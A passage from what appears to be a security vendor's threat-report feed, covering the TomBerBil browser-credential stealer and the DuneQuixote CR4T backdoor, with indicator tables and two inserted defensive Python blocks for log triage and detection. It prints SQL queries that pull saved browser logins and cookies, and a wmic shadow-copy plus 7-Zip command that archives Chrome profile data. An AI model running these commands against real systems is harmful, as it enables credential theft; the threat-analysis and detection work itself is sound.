  285. It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
  286. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
  287. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
  288. Data retrieved this way is decrypted with the master key and saved in special files.</p>
  289. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
  290. [+] Current user SYSTEM
  291. [*] [5516] [explorer] [UserName]
  292. [+] Impersonate user UserName
  293. [+] Current user UserName
  294. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
  295. [+] MasterKeyBytes: 6j&lt;...&gt;k=
  296. [&gt;] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
  297. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
  298. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
  299. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
  300. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
  301. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
  302. [+] MasterKeyBytes: fv&lt;...&gt;GM=
  303. [&gt;] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
  304. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
  305. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
  306. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
  307. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
  308. [+] Recvtoself
  309. [+] Current user SYSTEM
  310. [+] End 7/28/2023 1:12:52 PM</pre><p>
  311. One of the variants mimics <strong>Kaspersky Anti-Virus. </strong>This executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and contains relevant metadata:</p>
  312. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset=" 767w, 300w, 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
  313. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
  314. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset=" 1024w, 300w, 768w, 740w, 800w, 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
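The log format above is regular enough to be parsed during incident response. The following Python, an added example rather than code from the report or from TomBerBil, turns such a log into a triage record: which explorer.exe owner was impersonated, which browsers' Local State files and profile stores were staged, how long the run took, and which temporary copies were never deleted and may still be recoverable. The sample log is constructed to follow the quoted format (fictitious user, one staged copy deliberately left undeleted).

```python
"""Triage of a TomBerBil-style activity log (added example; not the tool's or the report's code)."""
import re
from dataclasses import dataclass, field
from datetime import datetime
from typing import Optional

# Constructed sample shaped like the log quoted in the report: fictitious user "alice";
# the staged Edge "Login Data" copy intentionally has no matching "Delete File" line.
SAMPLE_LOG = r"""[+] Begin 7/28/2023 1:12:37 PM
[+] Current user SYSTEM
[*] [5516] [explorer] [alice]
[+] Impersonate user alice
[+] Local State File: C:\Users\alice\AppData\Local\Google\Chrome\User Data\Local State
[+] MasterKeyBytes: 6j<...>k=
[>] Profile: C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default
[+] Copy C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
[+] Delete File C:\Windows\TEMP\tmpF319.tmp
[+] Copy C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
[+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
[+] Local State File: C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Local State
[+] MasterKeyBytes: fv<...>GM=
[>] Profile: C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default
[+] Copy C:\Users\alice\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
[+] Recvtoself
[+] End 7/28/2023 1:12:52 PM
"""

TIMESTAMP_FMT = "%m/%d/%Y %I:%M:%S %p"  # "7/28/2023 1:12:37 PM"
RULES = {
    "begin": re.compile(r"^\[\+\] Begin (.+)$"),
    "end": re.compile(r"^\[\+\] End (.+)$"),
    "explorer": re.compile(r"^\[\*\] \[(\d+)\] \[(\w+)\] \[(.+)\]$"),  # [pid] [process] [owner]
    "impersonate": re.compile(r"^\[\+\] Impersonate user (.+)$"),
    "local_state": re.compile(r"^\[\+\] Local State File: (.+)$"),     # where the master key is read
    "copy": re.compile(r"^\[\+\] Copy (.+?) to (.+)$"),                 # store file -> %TEMP% copy
    "delete": re.compile(r"^\[\+\] Delete File (.+)$"),
}
BROWSER_DIRS = {"\\Google\\Chrome\\": "Chrome", "\\Microsoft\\Edge\\": "Edge"}


@dataclass
class Triage:
    started: Optional[datetime] = None
    ended: Optional[datetime] = None
    explorer_owners: dict = field(default_factory=dict)   # explorer.exe PID -> owning user
    impersonated: list = field(default_factory=list)      # users the tool switched into
    local_state_files: list = field(default_factory=list)
    copies: list = field(default_factory=list)            # (source store file, temp copy)
    deleted: set = field(default_factory=set)             # temp copies removed afterwards

def browser_of(path: str) -> str:
    """Name the browser a Chrome/Edge data path belongs to ('unknown' otherwise)."""
    for marker, name in BROWSER_DIRS.items():
        if marker in path:
            return name
    return "unknown"

def parse_log(text: str) -> Triage:
    """Walk the log line by line; each line matches at most one rule."""
    t = Triage()
    for line in (ln.strip() for ln in text.splitlines()):
        for kind, rx in RULES.items():
            m = rx.match(line)
            if m:
                _apply(t, kind, m.groups())
                break
    return t

def _apply(t: Triage, kind: str, g: tuple) -> None:
    if kind == "begin":
        t.started = datetime.strptime(g[0], TIMESTAMP_FMT)
    elif kind == "end":
        t.ended = datetime.strptime(g[0], TIMESTAMP_FMT)
    elif kind == "explorer":
        t.explorer_owners[int(g[0])] = g[2]
    elif kind == "impersonate":
        t.impersonated.append(g[0])
    elif kind == "local_state":
        t.local_state_files.append(g[0])
    elif kind == "copy":
        t.copies.append((g[0], g[1]))
    elif kind == "delete":
        t.deleted.add(g[0])

def duration_seconds(t: Triage) -> int:
    """Length of the run in seconds, or -1 if the log lacks Begin/End."""
    if t.started is None or t.ended is None:
        return -1
    return int((t.ended - t.started).total_seconds())

def stores_accessed(t: Triage) -> set:
    """(browser, store) pairs that were staged, e.g. ('Chrome', 'Cookies')."""
    return {(browser_of(src), src.rsplit("\\", 1)[-1]) for src, _ in t.copies}

def leftover_temp_copies(t: Triage) -> list:
    """Staged copies with no matching delete: worth recovering from %TEMP% during IR."""
    return [tmp for _, tmp in t.copies if tmp not in t.deleted]
```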
315. <p>In several cases, besides using TomBerBil, the adversary created a shadow copy of the disk and archived the browser&#8217;s <strong>User Data</strong> folder with <a href="" target="_blank" rel="noopener">7zip</a> for further exfiltration.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
  316. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
  317. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\&lt;username&gt;\AppData\Local\Google\
318. Chrome\"User Data\"</pre>
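As an added defensive example (not code from the report), the following Python classifies process-creation events for the pattern above: a WMI shadow copy creation followed, on the same host, by a process reading Chrome or Edge User Data through a \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN path. It matches on the device path rather than the archiver name, since the actor ran a renamed 7-Zip (7z6.exe); the Sysmon/4688-style events, hostnames and users are constructed.

```python
"""Detection of the shadow-copy-then-archive pattern (added example; not the report's code).

Input is process-creation telemetry (Sysmon Event ID 1 or Security 4688 style) reduced to
host, user, time, image and command line. The events below are constructed."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    ts: int          # seconds since epoch (constructed values)
    image: str
    cmdline: str


# Shadow copy creation through WMI, as in the report.
SHADOW_CREATE = re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bcall\s+create\b", re.I)
# Any process reading from a shadow copy device path. Match the path, not the archiver:
# the actor used a renamed 7-Zip binary (7z6.exe), so tool names are a weak anchor.
SHADOW_READ = re.compile(r"\\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy\d+\\", re.I)
# Chrome/Edge profile roots; the optional quote covers the \"User Data\" quoting in the report.
BROWSER_DATA = re.compile(r"\\(Google\\Chrome|Microsoft\\Edge)\\\"?User Data", re.I)

SAMPLE_EVENTS = [
    ProcEvent("WS01", "CORP\\alice", 1_700_000_000, "wmic.exe",
              r"wmic shadowcopy call create Volume='C:\'"),
    ProcEvent("WS01", "CORP\\alice", 1_700_000_090, "cmd.exe",
              r'"cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r '
              r'\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\alice\AppData\Local\Google\Chrome\"User Data\"'),
    # Restore from an older snapshot with no creation seen on this host: low severity.
    ProcEvent("WS02", "CORP\\bob", 1_700_000_500, "robocopy.exe",
              r"robocopy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Users\bob\Documents D:\restore /E"),
    ProcEvent("WS03", "CORP\\svc_backup", 1_700_000_700, "vssadmin.exe", "vssadmin list shadows"),
]


def classify(ev: ProcEvent) -> set:
    """Tag a single event; an empty set means nothing of interest."""
    tags = set()
    if SHADOW_CREATE.search(ev.cmdline):
        tags.add("shadowcopy_create")
    if SHADOW_READ.search(ev.cmdline):
        tags.add("reads_shadowcopy")
        if BROWSER_DATA.search(ev.cmdline):
            tags.add("browser_data")
    return tags


def detect(events, window_s: int = 900) -> list:
    """Per host, raise one alert per shadow-copy read; severity rises when the read
    targets browser profile data and follows a shadow copy creation within window_s."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e.ts):
        by_host.setdefault(ev.host, []).append(ev)
    alerts = []
    for host, evs in by_host.items():
        create_times = [e.ts for e in evs if "shadowcopy_create" in classify(e)]
        for ev in evs:
            tags = classify(ev)
            if "reads_shadowcopy" not in tags:
                continue
            after_create = any(0 <= ev.ts - c <= window_s for c in create_times)
            browser = "browser_data" in tags
            if browser and after_create:
                severity = "high"
            elif browser or after_create:
                severity = "medium"
            else:
                severity = "low"
            alerts.append({"host": host, "user": ev.user, "image": ev.image,
                           "severity": severity, "after_create": after_create,
                           "browser_data": browser})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```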
  319. <h2 id="conclusion">Conclusion</h2>
  320. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
  321. <p>To protect the organization&#8217;s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.</p>
  322. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  323. <p><strong>Files</strong></p>
  324. <table width="100%">
  325. <tbody>
  326. <tr>
  327. <td width="60%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
  328. <td width="40%">WAExp</td>
  329. </tr>
  330. <tr>
  331. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
  332. <td>WAExp</td>
  333. </tr>
  334. <tr>
  335. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
  336. <td>cuthead</td>
  337. </tr>
  338. <tr>
  339. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
  340. <td>cuthead</td>
  341. </tr>
  342. <tr>
  343. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
  344. <td>TomBerBil</td>
  345. </tr>
  346. <tr>
  347. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
  348. <td>TomBerBil</td>
  349. </tr>
  350. <tr>
  351. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
  352. <td>Krong</td>
  353. </tr>
  354. </tbody>
  355. </table>
356. <p><strong>Legitimate tools</strong></p>
  357. <table width="100%">
  358. <tbody>
  359. <tr>
  360. <td width="60%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
  361. <td width="40%">FRP client</td>
  362. </tr>
  363. <tr>
  364. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
  365. <td>vpnserver_x64.exe</td>
  366. </tr>
  367. <tr>
  368. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
  369. <td>vpnserver_x64.exe</td>
  370. </tr>
  371. <tr>
  372. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
  373. <td>ngrok.exe</td>
  374. </tr>
  375. <tr>
  376. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
  377. <td>ngrok.exe</td>
  378. </tr>
  379. </tbody>
  380. </table>
  381. <p><strong>C2 addresses</strong></p>
  382. <table width="100%">
  383. <tbody>
384. <tr>
385. <td width="40%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
386. <td width="60%">SSH server</td>
387. </tr>
388. <tr>
389. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
390. <td>SoftEther VPN server</td>
391. </tr>
392. <tr>
393. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
394. <td>SoftEther VPN server</td>
395. </tr>
  396. </tbody>
  397. </table>
  398. <p><strong>Links</strong></p>
  399. <table width="100%">
  400. <tbody>
  401. <tr>
  402. <td width="75%"><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
  403. <td width="25%">vpnserver_x64.exe</td>
  404. </tr>
  405. <tr>
  406. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
  407. <td>Hamcore.se2</td>
  408. </tr>
  409. <tr>
  410. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
  411. <td>Hamcore.se2</td>
  412. </tr>
  413. <tr>
  414. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
  415. <td>vpnserver_x64.exe</td>
  416. </tr>
  417. <tr>
  418. <td><a href=";utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
  419. <td>Hamcore.se2</td>
  420. </tr>
  421. </tbody>
  422. </table>
  423. ]]></content:encoded>
  424. <wfw:commentRss></wfw:commentRss>
  425. <slash:comments>0</slash:comments>
  426. <media:content xmlns:media="" url="" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
  427. <media:content xmlns:media="" url="" width="1024" height="643"><media:keywords>large</media:keywords></media:content>
  428. <media:content xmlns:media="" url="" width="300" height="188"><media:keywords>medium</media:keywords></media:content>
  429. <media:content xmlns:media="" url="" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  430. </item>
  431. <item>
  432. <title>DuneQuixote campaign targets Middle Eastern entities with &#8220;CR4T&#8221; malware</title>
  433. <link></link>
  434. <comments></comments>
  435. <dc:creator><![CDATA[GReAT]]></dc:creator>
  436. <pubDate>Thu, 18 Apr 2024 10:00:07 +0000</pubDate>
  437. <category><![CDATA[APT reports]]></category>
  438. <category><![CDATA[APT]]></category>
  439. <category><![CDATA[Backdoor]]></category>
  440. <category><![CDATA[Dropper]]></category>
  441. <category><![CDATA[DuneQuixote]]></category>
  442. <category><![CDATA[Malware]]></category>
  443. <category><![CDATA[Malware Descriptions]]></category>
  444. <category><![CDATA[Malware Technologies]]></category>
  445. <category><![CDATA[Middle East]]></category>
  446. <category><![CDATA[Targeted attacks]]></category>
  447. <category><![CDATA[Trojan]]></category>
  448. <category><![CDATA[APT (Targeted attacks)]]></category>
  449. <guid isPermaLink="false"></guid>
  451. <description><![CDATA[New unattributed DuneQuixote campaign targeting entities in the Middle East employs droppers disguised as Total Commander installer and CR4T backdoor in C and Go.]]></description>
  452. <content:encoded><![CDATA[<p><img width="990" height="400" src="" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="introduction">Introduction</h2>
453. <p>In February 2024, we discovered a new malware campaign targeting government entities in the Middle East. We dubbed it &#8220;DuneQuixote&#8221;, and our investigation uncovered over 30 DuneQuixote dropper samples actively employed in the campaign. These droppers, which exist in two versions (regular droppers and tampered installer files for a legitimate tool named &#8220;Total Commander&#8221;), carried malicious code to download an additional payload in the form of a backdoor we call &#8220;CR4T&#8221;. While we identified only two CR4T implants at the time of discovery, we strongly suspect the existence of others, which may be completely different malware.</p>
  454. <p>The group behind the campaign took steps to prevent collection and analysis of its implants and implemented practical and well-designed evasion methods both in network communications and in the malware code.</p>
  455. <h2 id="initial-dropper">Initial dropper</h2>
  456. <p>The initial dropper is a Windows x64 executable file, although there are also DLL versions of the malware sharing the same functionality. The malware is developed in C/C++ without utilizing the Standard Template Library (STL), and certain segments are coded in pure Assembler. All samples contain digital signatures, which are, however, invalid.</p>
  457. <p>Upon execution, the malware initiates a series of decoy API calls that serve no practical purpose. These calls primarily involve string comparison functions, executed without any conditional jumps based on the comparison results.</p>
  458. <div id="attachment_112428" style="width: 805px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112428" class="size-full wp-image-112428" src="" alt="Useless function calls" width="795" height="417" srcset=" 795w, 300w, 768w, 667w, 740w, 534w" sizes="(max-width: 795px) 100vw, 795px" /></a><p id="caption-attachment-112428" class="wp-caption-text">Useless function calls</p></div>
  459. <p>The strings specified in these functions are snippets from Spanish poems. These vary from one sample to another, thereby altering the signature of each sample to evade detection using traditional detection methodologies. Following the execution of decoy functions, the malware proceeds to construct a structure for the necessary API calls. This structure is populated with offsets of Windows API functions, resolved utilizing several techniques.</p>
  460. <p>Initially, the malware decrypts the names of essential Windows core DLLs using a straightforward XOR decryption algorithm. It employs multiple decryption functions to decode strings, where a single function might decrypt several strings. However, in our analysis, we observed samples where each string was decrypted using a dedicated function, each employing a slightly varied decryption algorithm.</p>
  461. <div id="attachment_112429" style="width: 605px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112429" class="size-full wp-image-112429" src="" alt="String decryption algorithm" width="595" height="373" srcset=" 595w, 300w, 558w, 447w" sizes="(max-width: 595px) 100vw, 595px" /></a><p id="caption-attachment-112429" class="wp-caption-text">String decryption algorithm</p></div>
  462. <p>Once the necessary strings have been decrypted, the malware uses a standard technique for dynamically resolving API calls to obtain their memory offsets by:</p>
  463. <ul>
  464. <li>retrieving the offset of the Process Environment Block (PEB);</li>
  465. <li>locating the export table offset of <em>kernel32.dll</em>;</li>
  466. <li>identifying the offset for the GetProcAddress function.</li>
  467. </ul>
  468. <p>In the process of obtaining the PEB offset, the malware first decrypts the constant <em>0x60</em>, which is used to locate the PEB64 structure. This approach is of particular interest because, typically, malicious samples or shellcode utilizing this technique opt for a hardcoded plain text constant value for this purpose.</p>
  469. <div id="attachment_112430" style="width: 436px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112430" class="size-full wp-image-112430" src="" alt="Getting PEB structure offset" width="426" height="88" srcset=" 426w, 300w" sizes="(max-width: 426px) 100vw, 426px" /></a><p id="caption-attachment-112430" class="wp-caption-text">Getting PEB structure offset</p></div>
  470. <p>Next, the malware begins to populate the previously created structure with the offsets of all required functions.</p>
  471. <p>The dropper then proceeds to decrypt the C2 (Command and Control) address, employing a unique technique designed to prevent the exposure of the C2 to automated malware analysis systems. This method involves first retrieving the filename under which the dropper was executed, then concatenating this filename with one of the hardcoded strings from Spanish poems. Following this, the dropper calculates the MD5 hash of the concatenated string, which is then used as a key for decrypting the C2 string.</p>
  472. <div id="attachment_112431" style="width: 1034px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112431" class="size-large wp-image-112431" src="" alt="C2 decryption algorithm" width="1024" height="171" srcset=" 1024w, 300w, 768w, 1536w, 740w, 800w, 1545w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112431" class="wp-caption-text">C2 decryption algorithm</p></div>
  473. <p>Following the decryption of the C2 string, the malware attempts to establish a connection with the C2 server using a specifically hardcoded ID as the user agent to download the payload. During our research of the C2 infrastructure, we found that the payload remains inaccessible for download unless the correct user agent is provided. Furthermore, it appears that the payload may only be downloaded once per victim or is only available for a brief period following the release of a malware sample into the wild, as we were unable to obtain most of the payload implants from active C2 servers.</p>
  474. <p>Once the payload is downloaded into the process&#8217;s memory, the dropper performs a verification check for the &#8220;M&#8221; (<em>0x4D</em> in hexadecimal) magic byte at the start of the memory blob. This check likely serves to confirm that the payload has an MZ file signature, thereby indicating it is a valid executable format.</p>
  475. <h2 id="total-commander-installer-dropper">Total Commander installer dropper</h2>
  476. <p>The Total Commander installer dropper is created to mimic a <a href="" target="_blank" rel="noopener">legitimate Total Commander </a>software installer. It is, in fact, the legitimate installer file, but with an added malicious file section (<em>.textbss</em>) and a modified entry point. This tampering results in invalidating the official digital signature of the Total Commander installer.</p>
  477. <p>The installer dropper retains the core functionality of the initial dropper but with several key differences. Unlike the original dropper, it omits the use of Spanish poem strings and the execution of decoy functions. It also implements a series of anti-analysis measures and checks that prevent a connection to C2 resources, if any of the following conditions are true:</p>
  478. <ul>
  479. <li>a debugger is present in the system;</li>
  480. <li>known research or monitoring tools are among running processes;</li>
481. <li><em>explorer.exe</em> process has more than two instances;</li>
  482. <li>any of the following processes are running:
  483. <ul>
  484. <li>&#8220;python.exe&#8221;</li>
  485. <li>&#8220;taskmgr.exe&#8221;</li>
  486. <li>&#8220;procmon.exe&#8221;</li>
  487. <li>&#8220;resmon.exe&#8221;</li>
  488. <li>&#8220;eventvwr.exe&#8221;</li>
  489. <li>&#8220;process_hacker.exe&#8221;</li>
  490. </ul>
  491. </li>
  492. <li>less than 8 GB RAM available;</li>
  493. <li>the position of the cursor does not change over a certain timeframe;</li>
  494. <li>disk capacity is less than 40 GB.</li>
  495. </ul>
496. <p>If any of the anti-analysis checks fail, the malware returns a value of 1. This specific return value plays a role in the decryption of the C2 server address. It triggers the removal of the first &#8220;h&#8221; from the beginning of the C2 URL (&#8220;<em>https</em>&#8221;), effectively changing it to &#8220;<em>ttps</em>&#8221;. As a result, the altered URL prevents the establishment of a connection to the C2 server.</p>
  497. <h2 id="memory-only-cr4t-implant">Memory-only CR4T implant</h2>
  498. <p>The &#8220;CR4T&#8221; implant is designed with the primary goal of granting attackers access to a console for command line execution on the victim&#8217;s machine. Additionally, it facilitates the download, upload, and modification of files. The malware carries a PDB string in its code:</p><pre class="crayon-plain-tag">"C:\Users\user\Desktop\code\CR4T\x64\Release\CR4T.pdb"</pre><p>
  499. That&#8217;s why we dubbed it &#8220;CR4T&#8221;.</p>
  500. <p>Upon execution by the dropper, the implant initiates a <em>cmd.exe</em> process in a hidden window and establishes two named pipes to enable inter-process communication. It then configures the user agent for communication with the C2 server, embedding the hardcoded value &#8220;TroubleShooter&#8221; as the user agent name for requests to the C2.</p>
  501. <div id="attachment_112432" style="width: 664px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112432" class="size-full wp-image-112432" src="" alt="User-agent string" width="654" height="132" srcset=" 654w, 300w" sizes="(max-width: 654px) 100vw, 654px" /></a><p id="caption-attachment-112432" class="wp-caption-text">User-agent string</p></div>
  502. <p>After that, the implant retrieves the computer name of the infected host as well as the username of the current user. Then it establishes a connection to the C2 server. This session provides interactive access to the command line interface of the victim&#8217;s machine via the earlier mentioned named pipes. Commands and their outputs are encoded using Base64 before being sent and decoded after receiving.</p>
503. <p>After establishing the connection, the implant remains idle, awaiting an initial command from the C2 operator to activate the required functionality. This command is represented by a one-byte value, each one mapped to a specific action on the infected system. These single-character commands would likely make more sense for an English-speaking developer/operator than a Spanish-speaking one, e.g. &#8220;D&#8221; for Download and &#8220;U&#8221; for Upload (where a Spanish speaker might use &#8220;Cargar&#8221;).</p>
504. <table width="100%">
505. <tbody>
506. <tr>
507. <td width="25%"><strong>Command</strong></td>
508. <td width="75%"><strong>Functionality</strong></td>
509. </tr>
510. <tr>
511. <td>&#8216;C&#8217; (0x43)</td>
512. <td>Provide access to the command line interface via a named pipe.</td>
513. </tr>
514. <tr>
515. <td>&#8216;D&#8217; (0x44)</td>
516. <td>Download file from the C2</td>
517. </tr>
518. <tr>
519. <td>&#8216;U&#8217; (0x55)</td>
520. <td>Upload file to the C2</td>
521. </tr>
522. <tr>
523. <td>&#8216;S&#8217; (0x53)</td>
524. <td>Sleep</td>
525. </tr>
526. <tr>
527. <td>&#8216;R&#8217; (0x52)</td>
528. <td>Exit process</td>
529. </tr>
530. <tr>
531. <td>&#8216;T&#8217; (0x57)</td>
532. <td>Write to a file (T here possibly stands for a file-write <em>task</em>)</td>
533. </tr>
534. </tbody>
535. </table>
  536. <p>During our investigation, we discovered evidence of a PowerShell file that had been created using the &#8220;T&#8221; command:</p><pre class="crayon-plain-tag">"powershell -c \"Get-ScheduledTask | Where-Object {$_.TaskName -like 'User_Feed_Sync*' -and $_.State -eq 'Running'} | Select-Object TaskName\"</pre><p>
537. The threat actor was observed attempting to retrieve the names of all scheduled tasks on the infected machine beginning with &#8220;<em>User_Feed_Sync</em>&#8221;. These scheduled tasks were probably created by the Golang version of CR4T for persistence purposes.</p>
  538. <h2 id="memory-only-golang-cr4t-implant">Memory-only Golang CR4T implant</h2>
  539. <p>We also discovered a Golang version of the CR4T implant, which shares similar capabilities with the C version and has a similar string related to the internal naming:</p>
540. <pre class="crayon-plain-tag">"C:/Users/user/Desktop/code/Cr4tInst/main.go"</pre>
  541. <p>This variant provides a command line console for interaction with infected machines, as well as file download and upload capabilities. It also possesses the functionality to execute commands on the victim&#8217;s machine. A notable difference of this version is its ability to create scheduled tasks using the Golang <a href="">Go-ole</a> library. This library leverages Windows Component Object Model (COM) object interfaces for interacting with the Task Scheduler service.</p>
  542. <div id="attachment_112433" style="width: 716px" class="wp-caption aligncenter"><a href="" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112433" class="size-full wp-image-112433" src="" alt=" CR4T using go-ole library" width="706" height="447" srcset=" 706w, 300w, 553w, 442w" sizes="(max-width: 706px) 100vw, 706px" /></a><p id="caption-attachment-112433" class="wp-caption-text">CR4T using go-ole library</p></div>
543. <p>The malware is also capable of achieving persistence by utilizing the <a href="" target="_blank" rel="noopener">COM object hijacking</a> technique. Finally, it uses the Telegram API for C2 communications, implementing the public <a href="" target="_blank" rel="noopener">Golang Telegram API</a> bindings. All the interactions are similar to the C/C++ version.</p>
  544. <h2 id="infrastructure">Infrastructure</h2>
  545. <p>The infrastructure used in this campaign appears to be located in the US at two different commercial hosters.</p>
  546. <table width="100%">
  547. <tbody>
  548. <tr>
  549. <td width="28%"><strong>Domain</strong></td>
  550. <td width="28%"><strong>IP</strong></td>
551. <td width="28%"><strong>First seen</strong></td>
  552. <td width="16%"><strong>ASN</strong></td>
  553. </tr>
  554. <tr>
  555. <td>commonline[.]space</td>
  556. <td>135.148.113[.]161</td>
557. <td>2023-12-16 23:20</td>
  558. <td>16276</td>
  559. </tr>
  560. <tr>
